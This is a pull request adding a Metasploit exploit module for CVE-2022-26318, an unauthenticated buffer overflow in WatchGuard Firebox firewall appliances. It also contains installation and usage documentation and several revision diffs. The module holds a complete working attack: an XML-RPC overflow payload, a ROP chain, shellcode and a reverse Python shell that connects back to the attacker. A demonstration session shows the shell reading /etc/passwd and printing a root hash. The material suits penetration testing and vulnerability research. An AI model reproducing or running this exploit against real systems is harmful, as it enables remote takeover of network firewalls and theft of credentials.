### PR TITLE
Watchguard firebox unauthenticated RCE [CVE-2022-26318]

### DIFF
--- a/documentation/modules/exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.md
+++ b/documentation/modules/exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances
+which is built from a cherrypy python backend sending XML-RPC requests to a C binary called `wgagent` using pre-authentication
+endpoint `/agent/login`.
+This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.
+Successful exploitation results in remote code execution as user `nobody`.
+
+## Installation
+### Installation steps to install Watchguard Firebox virtual appliance
+* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
+* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
+* Download the Watchguard Firebox `12.7.2` ova instance.
+* You can download it from [here](https://cdn.watchguard.com/SoftwareCenter/Files/XTM/12_7_2/FireboxV_12_7_2.ova).
+* Import the ova instance in your virtualization engine.
+* See instructions for VirtualBox [here](https://www.simplified.guide/virtualbox/vm-import).
+* Configure the network interfaces (first interface is WAN and second interface is internal).
+* You can either choose bridged or NAT depending on your preference for the test environment.
+* Boot up the Firebox VM.
+* You should be able to access the Watchguard Firebox either thru the console, `ssh` on port `4117`
+* or via the `webui` via `https://your_firebox_wan_ip:8080`.
+* The default account is `admin` and password is `readwrite`.
+
+You are now ready to test the module.
+
+## Verification Steps
+- [x] Start `msfconsole`
+- [x] `use exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318`
+- [x] `set rhosts <ip-target>`
+- [x] `set lhost <ip-attacker>`
+- [x] `set target <0=Automatic>`
+- [x] `exploit`
+
+you should get a `interactive python shell` .
+
+```shell
+msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > options
+
+Module options (exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
+                                         using-metasploit.html
+   RPORT      8080             yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       WatchGuard Firebox base url
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CreateSession  true             no        Create a new session for every successful login
+   LHOST                           yes       The listen address (an interface may be specified)
+   LPORT          4444             yes       The listen port
+   SHELL          /usr/bin/python  yes       The system shell to use
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Reverse Python Interactive Shell)
+
+View the full module info with the info, or info -d command.
+```
+
+## Options
+Please set the `SHELL` option to `/usr/bin/python` becuase this is the only shell available on the appliance.
+
+## Scenarios
+###  Watchguard Firebox  Automatic - cmd/unix/reverse_python
+```shell
+msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > set rhosts 192.168.201.24
+rhosts => 192.168.201.24
+msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.201.24:8080 can be exploited.
+[+] The target appears to be vulnerable.
+[*] 192.168.201.24:8080 - Attempting to exploit...
+[*] 192.168.201.24:8080 - Sending payload...
+[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.24:40354) at 2024-03-03 19:50:17 +0000
+
+
+Shell Banner:
+Python 2.7.14 (default, Oct 16 2019, 15:38:29)
+[GCC 6.5.0] on linux2
+-----
+
+>>> import os
+>>> import subprocess
+>>> os.listdir("./")
+['debug', 'platform', 'log', 'wgapi', 'hosts', 'mdev.seq', 'admd.rsync', 'portald', 'portald_data', 'eth0mac', 'rs_sn', 
+'.libtdts_ctrl.lck', 'fw', 'mwan.input', 'wgmsg', 'nwd_dfltmac', 'fqdn_dns_server_list', 'lm.conf', 'sw.conf', 'wcfqdn_label',
+'ifmd.cfg.lock', 'wgif_dhcp_eth0.pid', 'wgif_dhcp_eth0_uds', 'wgif_eth1.cfg.lock', 'wgif_eth1.cfg', 'rootca', 'haopevent.log',
+'keeper_init_uds', 'sslvpn', 'empty', 'certs.rsync', 'certs.unpack', 'csync', 'ldapsCA', 'iked.semid', 'system_hash.txt',
+'iked.params', 'iked.pid', 'cdiag', 'lockout_users.xml', 'dxcpd', 'wgredir.txt', 'dimension', 'affinityd.err', 'wgif_eth0.cfg.lock',
+'wgif_eth0.cfg', 'dhcp6d.conf', '6OGD.py', 'ifmd.cfg', 'dhcpd.conf', 'dnsmasq-internal.conf', 'radvd.conf', 'yDnm.py', 'HPM4.py']
+>>>
+>>> os.getuid()
+99
+>>> os.getgid()
+96
+>>> print(open("/etc/passwd").read())
+root:!$6$XlAENt8.$3RgXuDXBhgsf0FqJ0hrzmrh6qAhvMlCkU6Z976KIDI27gxIZOI0f27lkyJwubRxW5VaO4i9olIybS0Z2R9Ihw1:0:0:Administrator:/root:/bin/ash
+bin:x:1:1:bin:/bin:
+system:x:2:96:WG System daemons:/:
+nobody:x:99:99:Nobody:/:
+wgntp:x:98:98:OpenNTP daemon:/var/run/ntpd:
+openvpn:x:97:97:OpenVPN daemon:/:
+www:x:96:95:WebUI:/:
+cli:x:95:95:CLI:/:
+cfm:x:94:94:CFM:/var/cfm_sandbox:
+agent:x:93:96:WG Agent:/:
+scand:x:91:94:Scanning Daemon:/var/run/scand:
+spamd:x:90:94:Spam Daemon:/var/cfm_sandbox:
+sshd:x:89:89:sshd privilege separation:/var/empty:
+quagga:x:88:88:Quagga Dynamic Routing:/var/run/quagga:
+wgcha:x:92:96:WG Call Home Agent:/var/run/wgcha:
+netdbg:x:87:87:Diagnostic Utilities:/tmp/netdbg:
+cwagent:x:100:100:ConnectWise Agent:/var/empty:
+dimension:x:101:101:Dimension Service:/var/run/dimension:
+tss:x:102:102:trousers daemon:/:
+atagent:x:103:103:Autotask Agent:/var/empty:
+psad:x:104:104:PSA Daemon:/var/empty:
+guac:x:105:105:Guacamole Daemons:/var/run/guac:
+portald:x:106:105:Portald:/var/run/portald:
+admin:x:109:109:Admin Cli Access:/etc/wg/admin-home:/usr/bin/cli
+wgadmin:x:109:109:Admin Cli Access:/etc/wg/admin-home:/usr/bin/cli
+dnswatchd:x:110:96:DNSWatch Service Daemon:/var/empty:
+tpagent:x:111:96:Tigerpaw Agent:/var/empty:
+
+>>> print(open("/etc/group").read())
+admin:x:0:0
+bin:x:1:admin,bin
+nobody:x:99:
+wgntp:x:98:
+openvpn:x:97:
+wg:x:96:
+ui:x:95:
+proxy:x:94:
+sshd:x:89:
+quagga:x:88:
+netdbg:x:87:
+cwagent:x:100:
+dimension:x:101:
+tss:x:102:
+atagent:x:103:
+psad:x:104:
+ctlvpn:x:105:
+dnswatchd:x:107:
+
+>>> os.uname()
+('Linux', 'FireboxV', '4.14.83', '#1 SMP Mon Sep 27 17:48:07 PDT 2021', 'x86_64')
+>>>
+```
+## Limitations
+There is no `shell` installed and there is only a `busybox` version available with a very limited unix command set.
+The only option is to use the interactive python shell (`/usr/bin/python -i`) as payload to get access to the target.
+Check out `https://docs.python.org/2.7/library/os.html` to execute commands on the target.
+Another limitation is the crash of `wgagent` service that will show up in the diagnostic log and will break the user login via the `webui`.
+

--- a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
+++ b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -6,7 +6,7 @@
 require 'zlib'
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GoodRanking
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
 
@@ -48,7 +48,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_python'
+                'PAYLOAD' => 'cmd/unix/reverse_python',
+                'SHELL' => '/usr/bin/python'
               }
             }
           ]
@@ -60,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'RPORT' => 8080
         },
         'Notes' => {
-          'Stability' => [ CRASH_SAFE ],
+          'Stability' => [ SERVICE_RESOURCE_LOSS ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
           'Reliability' => [ REPEATABLE_SESSION ]
         }
@@ -113,14 +114,14 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"
     payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"
     payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00/usr/bin/python\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00#{datastore['SHELL']}\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"
     payload << "\x01\x00\x00\x00\x00\x00\x00"
     # shell code to launch an reverse interactive python shell
     # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed
     # The interactive Python shell (-i) is for now the only way to get shell access
     payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
     payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
-    payload << 'call(["/usr/bin/python","-i"]);'.encode
+    payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode
     return Zlib.gzip(payload)
   end
 

--- a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
+++ b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -124,40 +124,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return Zlib.gzip(payload)
   end
 
-  def create_final_payload
-    http_payload = "POST /agent/login HTTP/1.1\r\n"
-    http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
-    http_payload << "Accept-Encoding: gzip, deflate\r\n"
-    http_payload << "Accept: */*\r\n"
-    http_payload << "Connection: close\r\n"
-    http_payload << "Content-Encoding: gzip\r\n"
-
-    bof_payload = create_bof_payload
-
-    http_payload << "Content-Length: #{bof_payload.length}\r\n"
-    http_payload << "\r\n"
-
-    return http_payload.encode + bof_payload
-  end
-
-  def send_payload(payload)
-    sock = Rex::Socket::SslTcp.create(
-      'PeerHost' => datastore['RHOST'],
-      'PeerPort' => datastore['RPORT'],
-      'Proxies' => datastore['Proxies'],
-      'Context' => {
-        'Msf' => framework,
-        'MsfExploit' => self
-      }
-    )
-    sock.write(payload)
-  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-    fail_with(Failure::UnexpectedReply, "#{e.class} - #{e.message}")
-    elog(e)
-  ensure
-    sock.close if sock
-  end
-
   def on_new_session(session)
     # cleanup python payload script in /tmp
     session.run_command('import os')
@@ -174,8 +140,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     print_status("#{peer} - Attempting to exploit...")
-    final_payload = create_final_payload
+    bof_payload = create_bof_payload
     print_status("#{peer} - Sending payload...")
-    send_payload(final_payload)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),
+      'headers' => {
+        'Accept-Encoding' => 'gzip, deflate',
+        'Content-Encoding' => 'gzip'
+      },
+      'data' => bof_payload
+    })
   end
 end

--- a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
+++ b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Geutebruck instantrec Remote Command Execution',
+        'Name' => 'WatchGuard XTM Firebox Unauthenticated Remote Command Execution',
         'Description' => %q{
           This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
           and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
@@ -33,8 +33,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
           [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
           [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
-          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ],
-          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2022-26318' ]
+          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ]
         ],
         'License' => MSF_LICENSE,
         'Platform' => [ 'unix' ],
@@ -128,7 +127,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def create_final_payload
     http_payload = "POST /agent/login HTTP/1.1\r\n"
     http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
-    http_payload << "User-Agent: CVE-2022-26318\r\n"
     http_payload << "Accept-Encoding: gzip, deflate\r\n"
     http_payload << "Accept: */*\r\n"
     http_payload << "Connection: close\r\n"

--- a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
+++ b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -1,0 +1,182 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zlib'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geutebruck instantrec Remote Command Execution',
+        'Description' => %q{
+          This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox
+          and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary
+          called wgagent using pre-authentication endpoint /agent/login.
+          This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x
+          before 12.5.9_U2. Successful exploitation results in remote code execution as user nobody.
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Charles Fol (Ambionics Security)', # discovery
+          'Dylan Pindur (AssetNote)', # reverse engineering of CVE-2022-26318'
+          'Misterxid' # POC
+        ],
+        'References' => [
+          [ 'CVE', '2022-26318' ],
+          [ 'URL', 'https://www.ambionics.io/blog/hacking-watchguard-firewalls' ],
+          [ 'URL', 'https://www.assetnote.io/resources/research/diving-deeper-into-watchguard-pre-auth-rce-cve-2022-26318' ],
+          [ 'URL', 'https://github.com/misterxid/watchguard_cve-2022-26318' ],
+          [ 'URL', 'https://attackerkb.com/topics/t8Nrnu99ZE/cve-2022-26318' ],
+          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2022-26318' ]
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => [ 'unix' ],
+        'Privileged' => false,
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Automatic (Reverse Python Interactive Shell)',
+            {
+              'Platform' => [ 'unix' ],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-08-29',
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 8080
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'WatchGuard Firebox base url', '/' ])
+      ]
+    )
+  end
+
+  def check_watchguard_firebox?
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'auth', 'login'),
+      'vars_get' => {
+        'from_page' => '/'
+      }
+    })
+    return true if res && res.code == 200 && res.body.include?('Powered by WatchGuard Technologies') && res.body.include?('Firebox')
+
+    false
+  end
+
+  def create_bof_payload
+    # temporary filename in /tmp where python payload will be stored.
+    @py_fname = "/tmp/#{Rex::Text.rand_text_alphanumeric(4)}.py"
+    # xml overflow payload
+    payload = '<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><'.encode
+    payload << ('A' * 3181).encode
+    payload << 'MFA>'.encode
+    payload << ('<BBBBMFA>' * 3680).encode
+    # padding and rop chain
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00"
+    payload << "\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6"
+    payload << "\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00"
+    payload << "\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;"
+    payload << "\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00"
+    payload << "\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    payload << "\x00\x00\x00\x00\x00\x00\x00\x00\x00/usr/bin/python\x00#{@py_fname}\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef"
+    payload << "\x01\x00\x00\x00\x00\x00\x00"
+    # shell code to launch an reverse interactive python shell
+    # The Watchguard appliance has a very restricted linux command set, readonly root filesystem and no unix shells installed
+    # The interactive Python shell (-i) is for now the only way to get shell access
+    payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
+    payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
+    payload << 'call(["/usr/bin/python","-i"]);'.encode
+    return Zlib.gzip(payload)
+  end
+
+  def create_final_payload
+    http_payload = "POST /agent/login HTTP/1.1\r\n"
+    http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
+    http_payload << "User-Agent: CVE-2022-26318\r\n"
+    http_payload << "Accept-Encoding: gzip, deflate\r\n"
+    http_payload << "Accept: */*\r\n"
+    http_payload << "Connection: close\r\n"
+    http_payload << "Content-Encoding: gzip\r\n"
+
+    bof_payload = create_bof_payload
+
+    http_payload << "Content-Length: #{bof_payload.length}\r\n"
+    http_payload << "\r\n"
+
+    return http_payload.encode + bof_payload
+  end
+
+  def send_payload(payload)
+    sock = Rex::Socket::SslTcp.create(
+      'PeerHost' => datastore['RHOST'],
+      'PeerPort' => datastore['RPORT'],
+      'Proxies' => datastore['Proxies'],
+      'Context' => {
+        'Msf' => framework,
+        'MsfExploit' => self
+      }
+    )
+    sock.write(payload)
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    fail_with(Failure::UnexpectedReply, "#{e.class} - #{e.message}")
+    elog(e)
+  ensure
+    sock.close if sock
+  end
+
+  def on_new_session(session)
+    # cleanup python payload script in /tmp
+    session.run_command('import os')
+    session.run_command("os.remove(\"#{@py_fname}\")")
+    super
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    return CheckCode::Appears if check_watchguard_firebox?
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit...")
+    final_payload = create_final_payload
+    print_status("#{peer} - Sending payload...")
+    send_payload(final_payload)
+  end
+end

--- a/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
+++ b/modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb
@@ -121,19 +121,13 @@ class MetasploitModule < Msf::Exploit::Remote
     payload << 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'.encode
     payload << "s.connect((\"#{datastore['LHOST']}\",#{datastore['LPORT']})); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);".encode
     payload << "call([\"#{datastore['SHELL']}\",\"-i\"]);".encode
+    payload << "import os; os.remove(\"#{@py_fname}\");".encode
     return Zlib.gzip(payload)
-  end
-
-  def on_new_session(session)
-    # cleanup python payload script in /tmp
-    session.run_command('import os')
-    session.run_command("os.remove(\"#{@py_fname}\")")
-    super
   end
 
   def check
     print_status("Checking if #{peer} can be exploited.")
-    return CheckCode::Appears if check_watchguard_firebox?
+    return CheckCode::Detected if check_watchguard_firebox?
 
     CheckCode::Safe
   end


### PR DESCRIPTION
This module exploits a buffer overflow at the administration interface (8080 or 4117) of WatchGuard Firebox and XTM appliances which is built from a cherrypy python backend sending XML-RPC requests to a C binary called `wgagent` using pre-authentication endpoint `/agent/login`.
This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful exploitation results in remote code execution as user `nobody`.

## Installation steps to install Watchguard Firebox
* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. 
* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/).
* Download the Watchguard Firebox 12.7.2 ova instance from [here](https://cdn.watchguard.com/SoftwareCenter/Files/XTM/12_7_2/FireboxV_12_7_2.ova).
* Import the ova instance in your virtualization engine. See instructions for VirtualBox [here](https://www.simplified.guide/virtualbox/vm-import).
* Configure the network interfaces (first interface is WAN and second interface is internal). 
* You can either choose bridged or NAT depending on your preference for the test environment.
* Boot up the Firebox VM and should be able to access the Watchguard Firebox either thru the console, `ssh` on port `4117` or via the `webui` via `https://your_firebox_wan_ip:8080`.
* The default account is `admin` and password is `readwrite`.

You are now ready to test the module.

## Verification Steps
- [x] Start `msfconsole`
- [x] `use exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318`
- [x] `set rhosts <ip-target>`
- [x] `set lhost <ip-attacker>`
- [x] `set target <0=Automatic>`
- [x] `exploit`

you should get a `interactive python shell` .

```shell
msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > options

Module options (exploit/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                         ploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       WatchGuard Firebox base url
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   CreateSession  true             no        Create a new session for every successful login
   LHOST                           yes       The listen address (an interface may be specified)
   LPORT          4444             yes       The listen port
   SHELL          /usr/bin/python  yes       The system shell to use


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Reverse Python Interactive Shell)

View the full module info with the info, or info -d command.
```
## Scenarios
###  Watchguard Firebox  Automatic - cmd/unix/reverse_python
```shell
msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > set rhosts 192.168.201.24
rhosts => 192.168.201.24
msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(linux/http/watchguard_firebox_unauth_rce_cve_2022_26318) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.24:8080 can be exploited.
[+] The target appears to be vulnerable.
[*] 192.168.201.24:8080 - Attempting to exploit...
[*] 192.168.201.24:8080 - Sending payload...
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.24:40354) at 2024-03-03 19:50:17 +0000


Shell Banner:
Python 2.7.14 (default, Oct 16 2019, 15:38:29)
[GCC 6.5.0] on linux2
-----

>>> import os
>>> import subprocess
>>> os.listdir("./")
['debug', 'platform', 'log', 'wgapi', 'hosts', 'mdev.seq', 'admd.rsync', 'portald', 'portald_data', 'eth0mac', 'rs_sn', '.libtdts_ctrl.lck', 'fw', 'mwan.input', 'wgmsg', 'nwd_dfltmac', 'fqdn_dns_server_list', 'lm.conf', 'sw.conf', 'wcfqdn_label', 'ifmd.cfg.lock', 'wgif_dhcp_eth0.pid', 'wgif_dhcp_eth0_uds', 'wgif_eth1.cfg.lock', 'wgif_eth1.cfg', 'rootca', 'haopevent.log', 'keeper_init_uds', 'sslvpn', 'empty', 'certs.rsync', 'certs.unpack', 'csync', 'ldapsCA', 'iked.semid', 'system_hash.txt', 'iked.params', 'iked.pid', 'cdiag', 'lockout_users.xml', 'dxcpd', 'wgredir.txt', 'dimension', 'affinityd.err', 'wgif_eth0.cfg.lock', 'wgif_eth0.cfg', 'dhcp6d.conf', '6OGD.py', 'ifmd.cfg', 'dhcpd.conf', 'dnsmasq-internal.conf', 'radvd.conf', 'yDnm.py', 'HPM4.py']
>>>
>>> os.getuid()
99
>>> os.getgid()
96
>>> print(open("/etc/passwd").read())
root:!$6$XlAENt8.$3RgXuDXBhgsf0FqJ0hrzmrh6qAhvMlCkU6Z976KIDI27gxIZOI0f27lkyJwubRxW5VaO4i9olIybS0Z2R9Ihw1:0:0:Administrator:/root:/bin/ash
bin:x:1:1:bin:/bin:
system:x:2:96:WG System daemons:/:
nobody:x:99:99:Nobody:/:
wgntp:x:98:98:OpenNTP daemon:/var/run/ntpd:
openvpn:x:97:97:OpenVPN daemon:/:
www:x:96:95:WebUI:/:
cli:x:95:95:CLI:/:
cfm:x:94:94:CFM:/var/cfm_sandbox:
agent:x:93:96:WG Agent:/:
scand:x:91:94:Scanning Daemon:/var/run/scand:
spamd:x:90:94:Spam Daemon:/var/cfm_sandbox:
